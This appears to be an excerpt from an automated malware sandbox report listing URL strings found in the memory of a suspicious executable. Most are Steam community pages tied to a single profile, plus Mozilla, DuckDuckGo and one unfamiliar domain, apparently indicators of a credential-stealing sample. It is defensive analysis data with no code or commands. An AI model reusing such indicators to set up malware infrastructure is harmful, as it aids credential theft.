Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=i46kIf4uDBX
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/modalContent.js?v=XpCpvP7feUoO&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&l=english
Source: 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_global.css?v=_CwtgIbuqQ1L&l=english
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_responsive.css?v=kR9MtmbWSZEp&l=engli
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&l=engl
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_global.js?v=7glT1n_nkVCs&l=eng
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunf
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://help.steampowered.com/en/
Source: CFCFHJ.2.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: https://mozilla.org0/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199786602107[1].htm.2.dr String found in binary or memory: https://steamcommunity.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199786602107[1].htm.2.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199786602107
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://steamcommunity.com/market/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107$
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/badges
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/inventory/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/765611997866021077
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107H
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://store.steampo
Source: 76561199786602107[1].htm.2.dr String found in binary or memory: https://store.steampowered.com/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 76561199786602107[1].htm.2.dr String found in binary or memory: https://store.steampowered.com/about/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://store.steampowered.com/mobile
